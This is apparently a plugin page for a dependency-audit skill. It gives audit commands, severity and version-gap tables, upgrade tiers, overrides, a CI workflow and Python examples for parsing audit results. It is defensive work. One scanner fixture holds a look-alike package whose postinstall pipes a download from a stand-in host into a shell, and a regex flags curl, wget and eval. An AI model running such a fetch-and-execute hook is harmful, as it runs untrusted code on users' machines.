From memstack
Scans project dependencies for vulnerabilities, outdated packages, abandoned libraries, and supply chain risks. Auto-detects ecosystem and generates upgrade plan.
How this skill is triggered — by the user, by Claude, or both
Slash command
/memstack:dependency-audit
The summary Claude sees in its skill listing — used to decide when to auto-load this skill
*Scan project dependencies for vulnerabilities, outdated packages, abandoned libraries, and supply chain risks with a prioritized upgrade plan.*
When this skill activates, output:
🔒 Dependency Audit — Scanning your dependency tree...
| Context | Status |
|---|---|
| User says "dependency audit", "npm audit", "scan dependencies" | ACTIVE |
| User wants to check for vulnerable or outdated packages | ACTIVE |
| User mentions CVEs, supply chain security, or abandoned packages | ACTIVE |
| User wants OWASP web app security (not just dependencies) | DORMANT — see owasp-top10 |
| User wants secrets scanning (not package vulnerabilities) | DORMANT — see secrets-scanner |
| User wants general code review | DORMANT — see code-reviewer |
Identify the package ecosystem from project files:
| File Found | Ecosystem | Audit Command | Outdated Command |
|---|---|---|---|
| package.json | npm/Node.js | npm audit --json | npm outdated --json |
| package-lock.json | npm (locked) | npm audit --json | npm outdated --json |
| yarn.lock | Yarn | yarn audit --json (Yarn 1) or yarn npm audit --json (Yarn 2+) | yarn outdated --json (Yarn 1 only) |
| pnpm-lock.yaml | pnpm | pnpm audit --json | pnpm outdated --json |
| requirements.txt | pip/Python | pip-audit -r requirements.txt --format=json | pip list --outdated --format=json |
| Pipfile.lock | Pipenv | pipenv check --output json | pipenv update --dry-run |
| pyproject.toml | Poetry/Python | pip-audit --format=json (audits the installed environment) | poetry show --outdated |
| Cargo.toml | Rust/Cargo | cargo audit --json | cargo outdated --format json |
| go.mod | Go | govulncheck ./... | go list -u -m all |
| Gemfile.lock | Ruby/Bundler | bundle audit check --format json | bundle outdated |
Note that pip-audit, cargo-audit, cargo-outdated, govulncheck and bundler-audit are separate tools, not subcommands that ship with the package manager (pip install pip-audit; cargo install cargo-audit cargo-outdated; go install golang.org/x/vuln/cmd/govulncheck@latest; gem install bundler-audit). govulncheck only reports vulnerabilities in functions the module actually reaches, so a clean run does not mean every vulnerable module version is absent from go.sum; the Python and npm tools match on version alone and over-report in the other direction.
If multiple ecosystems are detected, audit all of them and report which ecosystem each finding belongs to.
Execute the appropriate audit command and parse results into a unified format:
── VULNERABILITY SCAN ─────────────────────
CVE-2024-XXXXX 🔴 CRITICAL
Package: [name]@[version]
Dependency: Direct / Transitive (via [parent])
Fixed in: [version]
Description: [brief description]
CVSS Score: [score]
Exploitability: [network/local] [complexity]
CVE-2024-YYYYY 🟡 HIGH
Package: [name]@[version]
Dependency: Transitive (via [parent] → [grandparent])
Fixed in: [version]
Description: [brief description]
CVSS Score: [score]
Exploitability: [network/local] [complexity]
Severity classification:
| Severity | CVSS Score | Icon | Action |
|---|---|---|---|
| Critical | 9.0 - 10.0 | 🔴 | Fix immediately — potential active exploitation |
| High | 7.0 - 8.9 | 🟡 | Fix within 1 week — significant risk |
| Medium | 4.0 - 6.9 | 🟠 | Fix within 1 month — moderate risk |
| Low | 0.1 - 3.9 | 🔵 | Fix when convenient — minimal risk |
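The parse-and-classify step the two sections above describe, as an added example that is not part of the memstack skill: it reads an `npm audit --json` report (the npm 7+ shape), keeps only entries that carry an advisory object in `via`, derives Direct/Transitive with the parent chain by following npm's `effects` list, and maps CVSS scores to the bands in the table (falling back to npm's own label when an advisory has no score). SAMPLE_REPORT and its package names, advisory ids and scores are constructed for illustration.

```python
"""Parse `npm audit --json` (the npm 7+ report shape) into the unified finding
format above. Added example, not part of the skill: SAMPLE_REPORT, its package
names, advisory ids and scores are constructed for illustration."""
import json
from dataclasses import dataclass

# Severity bands from the classification table above: (floor, label, icon).
CVSS_BANDS = ((9.0, "CRITICAL", "🔴"), (7.0, "HIGH", "🟡"),
              (4.0, "MEDIUM", "🟠"), (0.1, "LOW", "🔵"))
ICONS = {label: icon for _, label, icon in CVSS_BANDS}
# npm's own labels, used only when an advisory carries no CVSS score.
NPM_LABELS = {"critical": "CRITICAL", "high": "HIGH", "moderate": "MEDIUM", "low": "LOW", "info": "LOW"}

SAMPLE_REPORT = json.dumps({  # constructed; fields this parser never reads are omitted
    "auditReportVersion": 2,
    "vulnerabilities": {
        "parser-lib": {
            "name": "parser-lib", "severity": "critical", "isDirect": True,
            "via": [{"source": 1001, "name": "parser-lib", "severity": "critical",
                     "title": "Prototype pollution (constructed)", "range": "<2.0.1",
                     "url": "https://github.com/advisories/GHSA-example-0001",
                     "cvss": {"score": 9.8}}],
            "effects": ["web-framework"], "range": "<2.0.1",
            "fixAvailable": {"name": "parser-lib", "version": "2.0.1", "isSemVerMajor": False}},
        "web-framework": {  # affected only through its dependencies: `via` holds names, not advisories
            "name": "web-framework", "severity": "critical", "isDirect": True,
            "via": ["parser-lib", "log-util"], "effects": [], "range": "<=4.1.0",
            "fixAvailable": True},
        "log-util": {
            "name": "log-util", "severity": "moderate", "isDirect": False,
            "via": [{"source": 1002, "name": "log-util", "severity": "moderate",
                     "title": "ReDoS in format string (constructed)", "range": "<1.4.2",
                     "url": "https://github.com/advisories/GHSA-example-0002",
                     "cvss": {"score": 5.3}}],
            "effects": ["web-framework"], "range": "<1.4.2", "fixAvailable": False},
    },
})

@dataclass
class Finding:
    advisory: str
    package: str
    affected_range: str
    score: float
    severity: str
    icon: str
    dependency: str   # "Direct" or "Transitive (via parent → grandparent)"
    fixed_in: str
    title: str

def classify(score, npm_severity=""):
    """CVSS score decides the band; npm's label is the fallback when the score is 0 or missing."""
    if score:
        for floor, label, icon in CVSS_BANDS:
            if score >= floor:
                return label, icon
    label = NPM_LABELS.get(npm_severity, "LOW")
    return label, ICONS[label]

def dependency_chain(name, vulns):
    """Follow `effects` (the dependents npm lists) upward until a direct dependency is reached."""
    chain, seen, cur = [], {name}, name
    while cur in vulns and not vulns[cur].get("isDirect"):
        dependents = [d for d in vulns[cur].get("effects") or [] if d not in seen]
        if not dependents:
            break
        cur = dependents[0]   # first dependent only; a full tree walk would fan out here
        seen.add(cur)
        chain.append(cur)
    return chain

def describe_fix(fix):
    """fixAvailable is True/False or an object naming the top-level package to bump."""
    if isinstance(fix, dict):
        return f"{fix['name']}@{fix['version']}" + (" (major)" if fix.get("isSemVerMajor") else "")
    return "fix available (npm audit fix)" if fix else "no fix available"

def parse_npm_audit(report_json):
    vulns = json.loads(report_json).get("vulnerabilities", {})
    findings = []
    for name, entry in vulns.items():
        advisories = [v for v in entry.get("via", []) if isinstance(v, dict)]
        if not advisories:
            continue   # vulnerable only through another package, which carries the advisory
        chain = [] if entry.get("isDirect") else dependency_chain(name, vulns)
        dependency = "Direct" if entry.get("isDirect") else "Transitive" + (" (via %s)" % " → ".join(chain) if chain else "")
        for adv in advisories:
            score = float((adv.get("cvss") or {}).get("score") or 0)
            severity, icon = classify(score, adv.get("severity", ""))
            findings.append(Finding(
                advisory=adv.get("url", "").rstrip("/").rsplit("/", 1)[-1] or str(adv.get("source")),
                package=name, affected_range=adv.get("range") or entry.get("range", ""),
                score=score, severity=severity, icon=icon, dependency=dependency,
                fixed_in=describe_fix(entry.get("fixAvailable")), title=adv.get("title", "")))
    return sorted(findings, key=lambda f: -f.score)   # highest CVSS first, as in the template

if __name__ == "__main__":
    for f in parse_npm_audit(SAMPLE_REPORT):
        print(f"{f.advisory} {f.icon} {f.severity}: {f.package} [{f.dependency}] fixed in {f.fixed_in}")
```

`fixAvailable` for a transitive finding names the direct package to bump, not the vulnerable one; when it is `False`, the overrides mechanism further down is the remaining option.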
Direct vs transitive priority:
- Direct dependencies come first: the project controls the version, so the fix is a single install command and a test run.
- Transitive dependencies: update the direct parent that pulls them in; when no parent release carries the fix, pin the vulnerable package with overrides (npm) or resolutions (Yarn) as described in the overrides section below.
Run the outdated command and categorize results:
── OUTDATED PACKAGES ──────────────────────
Package Current Latest Type Risk
─────────────────────────────────────────────────────
[package-a] 1.2.3 1.2.8 Patch ✅ Safe — bug fixes only
[package-b] 2.1.0 2.4.0 Minor ✅ Safe — new features, backward compatible
[package-c] 3.0.0 4.2.1 Major ⚠️ Breaking — review changelog
[package-d] 1.0.0 1.0.0 Current ✅ Up to date
Version gap classification:
| Gap Type | Risk | Approach |
|---|---|---|
| Patch (1.2.3 → 1.2.8) | Very Low | Update immediately — bug/security fixes |
| Minor (2.1.0 → 2.4.0) | Low | Update in batch — new features, backward compatible |
| Major (3.0.0 → 4.2.1) | Medium-High | Review migration guide, test thoroughly |
| Multiple majors (1.x → 4.x) | High | Dedicate time, may require code changes |
Two exceptions to the "safe" rows: packages still at 0.x, where semver allows a 0.y minor bump to break the API (treat 0.8 → 0.9 as a major), and prerelease targets (2.0.0-beta.1), which belong in Tier 3 regardless of gap size.
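Classifying `npm outdated --json` output by version gap, as an added example that is not part of the memstack skill: it applies the table above, adds the 0.x and prerelease caveats, flags version strings that are not semver instead of guessing, and notes when `latest` lies outside the range declared in package.json (npm's `wanted`). SAMPLE_OUTDATED and its package names are constructed. npm only lists packages that are behind, so an "Up to date" row never appears in real output.

```python
"""Classify `npm outdated --json` output by semver gap, following the table above
and adding the 0.x caveat (semver lets 0.y.z minor bumps break). Added example,
not part of the skill; SAMPLE_OUTDATED is constructed for illustration."""
import json
import re

SEMVER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$")

SAMPLE_OUTDATED = json.dumps({  # constructed; shape of `npm outdated --json`
    "package-a": {"current": "1.2.3", "wanted": "1.2.8", "latest": "1.2.8", "dependent": "my-app"},
    "package-b": {"current": "2.1.0", "wanted": "2.4.0", "latest": "2.4.0", "dependent": "my-app"},
    "package-c": {"current": "3.0.0", "wanted": "3.5.2", "latest": "4.2.1", "dependent": "my-app"},
    "package-e": {"current": "0.8.1", "wanted": "0.8.1", "latest": "0.9.0", "dependent": "my-app"},
    "package-f": {"current": "1.0.0", "wanted": "1.9.0", "latest": "4.0.0", "dependent": "my-app"},
    "package-g": {"wanted": "2.0.0", "latest": "2.0.0", "dependent": "my-app"},  # declared, not installed
})

def parse_semver(text):
    """(major, minor, patch, prerelease-or-None), or None when the string is not semver."""
    m = SEMVER.match((text or "").strip())
    return (int(m[1]), int(m[2]), int(m[3]), m[4]) if m else None

def gap_type(current, latest):
    """Return (gap, risk, note). Non-semver strings are flagged for review, not guessed."""
    cur, new = parse_semver(current), parse_semver(latest)
    if cur is None or new is None:
        return "Unknown", "Review", "non-semver version string, inspect manually"
    if new[:3] <= cur[:3]:
        return "Current", "None", "up to date"
    pre = " (latest is a prerelease)" if new[3] else ""
    if new[0] != cur[0]:
        jump = new[0] - cur[0]
        if jump >= 2:
            return "Multiple majors", "High", f"{jump} major versions behind, dedicate time" + pre
        return "Major", "Medium-High", "breaking changes, review migration guide" + pre
    if new[1] != cur[1]:
        if cur[0] == 0:   # 0.x: semver permits breaking changes on a minor bump
            return "Major", "Medium-High", "0.x minor bump, semver permits breaking changes" + pre
        return "Minor", "Low", "new features, backward compatible" + pre
    return "Patch", "Very Low", "bug/security fixes only" + pre

def classify_outdated(report_json):
    rows = []
    for name, info in json.loads(report_json).items():
        current, wanted, latest = info.get("current"), info.get("wanted", ""), info.get("latest", "")
        if not current:
            rows.append({"package": name, "current": "MISSING", "latest": latest, "gap": "Not installed",
                         "risk": "Review", "note": "declared but absent from node_modules, run npm ci"})
            continue
        gap, risk, note = gap_type(current, latest)
        if wanted and wanted != latest:   # latest is outside the range package.json allows
            note += f"; latest {latest} is outside the declared range (wanted {wanted})"
        rows.append({"package": name, "current": current, "latest": latest,
                     "gap": gap, "risk": risk, "note": note})
    return rows

def render(rows):
    lines = ["── OUTDATED PACKAGES ──────────────────────",
             f"{'Package':<12}{'Current':<10}{'Latest':<10}{'Type':<18}Risk / note"]
    for r in rows:
        lines.append(f"{r['package']:<12}{r['current']:<10}{r['latest']:<10}{r['gap']:<18}{r['risk']}: {r['note']}")
    return "\n".join(lines)

if __name__ == "__main__":
    print(render(classify_outdated(SAMPLE_OUTDATED)))
```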
Check each dependency for maintenance status:
── ABANDONED PACKAGE CHECK ────────────────
Package Last Publish Downloads/wk Status
──────────────────────────────────────────────────────
[package-x] 3 years ago 12,000 ⚠️ ABANDONED — find alternative
[package-y] 2.5 years ago 800 🔴 DEAD — replace immediately
[package-z] 6 months ago 250,000 ✅ Active
Abandonment indicators:
For each abandoned package, suggest:
Check for packages with known supply chain risk factors:
| Risk Factor | Detection Method | Severity |
|---|---|---|
| Typosquatting | Package name similar to popular package | High |
| Install scripts | preinstall/install/postinstall scripts in package.json; they run arbitrary code at install time, so review them with npm install --ignore-scripts before letting them execute | Medium |
| Excessive permissions | Package code uses network, filesystem or child_process APIs its stated purpose does not need (registries grant no permission model, so this is found by reading the source) | Medium |
| Single maintainer | One person controls publishing | Low-Medium |
| Recent ownership transfer | npm ownership changed recently | High |
| Minified source only | No readable source code in package | Medium |
| Unpinned dependencies | Using * or >= in dependency ranges | Medium |
── SUPPLY CHAIN RISKS ─────────────────────
[package-a] ⚠️ Has postinstall script
Script: "postinstall": "node setup.js"
Review: [does it fetch remote code? write to fs? safe build step?]
[package-b] ⚠️ Single maintainer, low download count
Maintainer: [username]
Weekly downloads: [count]
Alternative: [more established package]
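The install-script, unpinned-range and typosquatting rows of the table above can be checked mechanically against the installed tree. The following is an added example, not part of the memstack skill: the POPULAR name list, the remote-fetch regex and the three sample packages it writes to a temporary node_modules are constructed, and the edit-distance threshold of 2 is an assumption (a real check compares against a large top-N list and includes scoped names).

```python
"""Static supply-chain checks over an installed node_modules tree: lifecycle
install scripts (with a crude remote-fetch heuristic), unpinned dependency
ranges and look-alike package names. Added example, not part of the skill:
POPULAR, the regexes and the packages in build_sample_tree() are constructed."""
import json
import re
import tempfile
from pathlib import Path

LIFECYCLE = ("preinstall", "install", "postinstall")   # hooks npm runs during install
REMOTE_FETCH = re.compile(r"(\bcurl\b|\bwget\b|https?://|\bnode\s+-e\b|\beval\()", re.I)
UNPINNED = re.compile(r"^\s*(\*|latest|x|>=?\s*\d)")    # "*", "latest", "x", ">1", ">=1"
POPULAR = ("lodash", "express", "react", "axios", "chalk")   # assumed; use a real top-N list

def edit_distance(a, b):
    """Plain Levenshtein distance, enough to catch one- or two-character squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def check_package(pkg_dir):
    """Return (package, issue, severity) tuples for one installed package."""
    meta = json.loads((pkg_dir / "package.json").read_text())
    name = meta.get("name", pkg_dir.name)
    findings = []
    for hook in LIFECYCLE:
        script = (meta.get("scripts") or {}).get(hook)
        if script:
            fetches = bool(REMOTE_FETCH.search(script))
            findings.append((name, f"{hook} script {script!r}" + (", fetches or evals remote code" if fetches else ""),
                             "High" if fetches else "Medium"))
    for dep, rng in (meta.get("dependencies") or {}).items():
        if UNPINNED.match(str(rng)):
            findings.append((name, f"unpinned dependency {dep}@{rng}", "Medium"))
    for popular in POPULAR:
        if name != popular and edit_distance(name, popular) <= 2:
            findings.append((name, f"name within edit distance 2 of {popular} (possible typosquat)", "High"))
    return findings

def scan_tree(node_modules):
    """Top-level and scoped packages only; nested node_modules would need a recursive walk."""
    root = Path(node_modules)
    manifests = sorted(list(root.glob("*/package.json")) + list(root.glob("@*/*/package.json")))
    findings = []
    for manifest in manifests:
        findings.extend(check_package(manifest.parent))
    return findings

def build_sample_tree():
    """Constructed node_modules: a clean package, a look-alike with a fetching postinstall,
    and one with a local build hook plus wildcard ranges."""
    root = Path(tempfile.mkdtemp()) / "node_modules"
    packages = {
        "left-pad-util": {"name": "left-pad-util", "version": "1.0.0",
                          "dependencies": {"tslib": "^2.6.0"}},
        "lodahs": {"name": "lodahs", "version": "4.17.99",
                   "scripts": {"postinstall": "curl -s https://example.invalid/x.sh | sh"}},
        "build-helper": {"name": "build-helper", "version": "0.3.0",
                         "scripts": {"postinstall": "node setup.js"},
                         "dependencies": {"debug": "*", "semver": ">=7"}},
    }
    for dirname, meta in packages.items():
        (root / dirname).mkdir(parents=True)
        (root / dirname / "package.json").write_text(json.dumps(meta))
    return root

if __name__ == "__main__":
    for pkg, issue, severity in scan_tree(build_sample_tree()):
        print(f"[{pkg}] {severity}: {issue}")
```

A local `node setup.js` hook is reported at Medium because the script still has to be read: the heuristic only promotes to High when the command text itself reaches for the network or an evaluator.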
Create a prioritized upgrade plan in three tiers:
━━━ TIER 1: IMMEDIATE (This Sprint) ━━━━━━
Critical/High vulnerabilities in direct dependencies.
Patch updates with no breaking changes.
1. [package]@[current] → [target]
Reason: 🔴 CVE-2024-XXXXX (CRITICAL)
Risk: Very Low — patch update
Command: npm install [package]@[target]
2. [package]@[current] → [target]
Reason: 🟡 CVE-2024-YYYYY (HIGH)
Risk: Low — minor update, run the test suite
Command: npm install [package]@[target]
━━━ TIER 2: PLANNED (Next 2 Weeks) ━━━━━━━
Medium vulnerabilities, minor version updates,
replacing abandoned packages.
3. [package]@[current] → [target]
Reason: 🟠 CVE-2024-ZZZZZ (MEDIUM) + 8 minor versions behind
Risk: Low — review changelog for deprecations
Command: npm install [package]@[target]
Test: [specific areas to regression test]
4. [package] → [replacement-package]
Reason: ⚠️ Abandoned (last publish: 2 years ago)
Risk: Medium — API differences, migration needed
Migration: [brief migration steps]
━━━ TIER 3: SCHEDULED (Next Quarter) ━━━━━━
Major version upgrades requiring migration effort.
5. [package]@[current] → [target]
Reason: 3 major versions behind, accumulating tech debt
Risk: High — breaking changes in v3 and v4
Migration guide: [URL]
Estimated effort: [hours/days]
Test: [comprehensive regression testing required]
When a transitive dependency can't be fixed by updating the direct parent:
npm (overrides in package.json):
{
  "overrides": {
    "vulnerable-package": ">=2.0.1"
  }
}
Yarn (resolutions in package.json):
{
  "resolutions": {
    "vulnerable-package": ">=2.0.1"
  }
}
pnpm (overrides in package.json):
{
  "pnpm": {
    "overrides": {
      "vulnerable-package": ">=2.0.1"
    }
  }
}
Pip (constraint file):
# constraints.txt
vulnerable-package>=2.0.1
pip install -c constraints.txt -r requirements.txt
Go: go get <module>@<fixed-version> raises the version that minimal version selection picks for the whole build, even for an indirect module. Cargo: cargo update -p vulnerable-package --precise <fixed-version> moves the lock file to that version, but only if it still satisfies the range the dependent declares; otherwise the dependent itself has to be updated.
Caution: Overrides can break compatibility, and they do nothing until the lock file is regenerated (npm install / yarn install / pnpm install). Confirm the resolved version with npm ls vulnerable-package (yarn why / pnpm why), re-run the audit, then run the test suite.
Recommend automated dependency scanning in CI:
# GitHub Actions example
name: Dependency Audit
on:
  schedule:
    - cron: '0 9 * * 1'   # weekly, Monday 09:00 UTC (GitHub cron runs in UTC)
  pull_request:
    paths:
      - 'package.json'
      - 'package-lock.json'
permissions:
  contents: read          # least privilege: the job only reads the repository
jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 'lts/*'
          cache: 'npm'
      - run: npm ci --ignore-scripts       # install from the lock file without running package install scripts
      - run: npm audit --audit-level=high   # fails the job on high/critical; lower severities only warn
      - run: npm outdated || true           # npm outdated exits 1 whenever something is behind; report only
Recommended tools for ongoing monitoring:
Present the complete dependency health report:
━━━ DEPENDENCY HEALTH REPORT ━━━━━━━━━━━━━
Project: [name]
Ecosystem: [npm/pip/cargo/etc.]
Scan date: [date]
Total dependencies: [direct] direct, [transitive] transitive
── VULNERABILITY SUMMARY ──────────────────
🔴 Critical: [count]
🟡 High: [count]
🟠 Medium: [count]
🔵 Low: [count]
── VULNERABILITIES ────────────────────────
[detailed CVE list with fix versions]
── OUTDATED PACKAGES ──────────────────────
Patch updates available: [count]
Minor updates available: [count]
Major updates available: [count]
── ABANDONED PACKAGES ─────────────────────
[list with alternatives]
── SUPPLY CHAIN RISKS ─────────────────────
[risk factors found]
── UPGRADE PLAN ───────────────────────────
Tier 1 (Immediate): [count] packages
Tier 2 (Planned): [count] packages
Tier 3 (Scheduled): [count] packages
── COMMANDS ───────────────────────────────
[copy-paste upgrade commands]
── CI RECOMMENDATION ──────────────────────
[automated scanning setup]
── HEALTH SCORE ───────────────────────────
Score: [X/100]
Vulnerabilities: [-points per severity]
Currency: [-points per outdated major]
Maintenance: [-points per abandoned dep]
Supply chain: [-points per risk factor]
Health score calculation:
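The tier rules of the upgrade plan above and the deduction categories of the health score, as an added example that is not part of the memstack skill. The tier rules follow the text, with one editorial extension: Critical/High vulnerabilities in transitive dependencies also land in Tier 1, fixed via overrides. The page gives no weights for the score, so WEIGHTS is an assumption, and SAMPLE_FINDINGS with its package names is constructed.

```python
"""Assign findings to the three upgrade tiers above and derive the health score
in the report template. Added example, not part of the skill: the tier rules
follow the text; the deduction WEIGHTS are assumptions (the page names the
categories but no numbers); SAMPLE_FINDINGS and its packages are constructed."""

# Assumed deductions per finding. The page lists the four categories; the
# numbers here make one critical CVE cost a quarter of the score.
WEIGHTS = {"CRITICAL": 25, "HIGH": 15, "MEDIUM": 5, "LOW": 1,
           "major_behind": 3, "abandoned": 5, "supply_chain": 2}

SAMPLE_FINDINGS = [  # constructed; "gap" uses the version-gap labels from the table above
    {"kind": "vuln", "package": "parser-lib", "current": "1.9.0", "target": "2.0.1",
     "severity": "CRITICAL", "direct": True, "gap": "Major", "cvss": 9.8},
    {"kind": "vuln", "package": "log-util", "current": "1.3.0", "target": "1.4.2",
     "severity": "MEDIUM", "direct": False, "gap": "Minor", "cvss": 5.3},
    {"kind": "vuln", "package": "tiny-cache", "current": "2.2.0", "target": "2.2.1",
     "severity": "LOW", "direct": True, "gap": "Patch", "cvss": 3.1},
    {"kind": "outdated", "package": "package-a", "current": "1.2.3", "target": "1.2.8", "gap": "Patch"},
    {"kind": "outdated", "package": "package-b", "current": "2.1.0", "target": "2.4.0", "gap": "Minor"},
    {"kind": "outdated", "package": "package-f", "current": "1.0.0", "target": "4.0.0", "gap": "Multiple majors"},
    {"kind": "abandoned", "package": "old-markdown", "current": "0.4.0", "target": "new-markdown@2.1.0"},
    {"kind": "supply_chain", "package": "build-helper", "issue": "postinstall script"},
]

def tier_for(finding):
    """Tier 1: Critical/High vulns (direct, and transitive via overrides: an editorial
    choice beyond the text) plus any patch-only fix. Tier 2: Medium vulns, minor
    updates, abandoned replacements. Tier 3: major migrations, including Low vulns
    whose fix is itself a major. Supply-chain items are review work, not upgrades."""
    kind, gap = finding["kind"], finding.get("gap", "")
    if kind == "vuln":
        if finding["severity"] in ("CRITICAL", "HIGH") or gap == "Patch":
            return 1
        if finding["severity"] == "MEDIUM" or gap == "Minor":
            return 2
        return 3
    if kind == "outdated":
        return {"Patch": 1, "Minor": 2}.get(gap, 3)
    if kind == "abandoned":
        return 2
    return None

def command_for(finding):
    if finding["kind"] == "abandoned":
        return f"npm uninstall {finding['package']} && npm install {finding['target']}"
    return f"npm install {finding['package']}@{finding['target']}"

def upgrade_plan(findings):
    tiers = {1: [], 2: [], 3: []}
    for f in findings:
        tier = tier_for(f)
        if tier is not None:
            tiers[tier].append(f)
    for items in tiers.values():   # vulnerabilities first, highest CVSS first, then the rest
        items.sort(key=lambda f: (f["kind"] != "vuln", -f.get("cvss", 0)))
    return tiers

def health_score(findings):
    """100 minus the per-category deductions from the report template, floored at 0."""
    deductions = {"Vulnerabilities": 0, "Currency": 0, "Maintenance": 0, "Supply chain": 0}
    for f in findings:
        if f["kind"] == "vuln":
            deductions["Vulnerabilities"] += WEIGHTS[f["severity"]]
        elif f["kind"] == "outdated" and f.get("gap") in ("Major", "Multiple majors"):
            deductions["Currency"] += WEIGHTS["major_behind"]
        elif f["kind"] == "abandoned":
            deductions["Maintenance"] += WEIGHTS["abandoned"]
        elif f["kind"] == "supply_chain":
            deductions["Supply chain"] += WEIGHTS["supply_chain"]
    return max(0, 100 - sum(deductions.values())), deductions

if __name__ == "__main__":
    tiers = upgrade_plan(SAMPLE_FINDINGS)
    for tier, label in ((1, "IMMEDIATE"), (2, "PLANNED"), (3, "SCHEDULED")):
        print(f"━━━ TIER {tier}: {label} ━━━")
        for f in tiers[tier]:
            print(f"  {f['package']}: {command_for(f)}")
    score, deductions = health_score(SAMPLE_FINDINGS)
    print(f"Score: {score}/100  {deductions}")
```

A vulnerability whose only fix is a major bump (parser-lib above) still sorts into Tier 1 by severity; the major-gap risk shows up in the command's target version, not in the tier, so the plan entry should carry the migration note the template asks for.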
Install via claudepluginhub: npx claudepluginhub cwinvestments/memstack --plugin memstack